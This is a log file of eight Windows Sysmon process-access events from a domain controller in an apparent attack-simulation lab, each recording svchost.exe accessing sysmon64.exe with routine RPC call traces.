{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1465,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.338\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.338","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1466,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.338\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.338","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1467,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.338\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.338","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1468,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1469,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.346\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.346","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1470,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1471,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1472,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.347\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.347","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
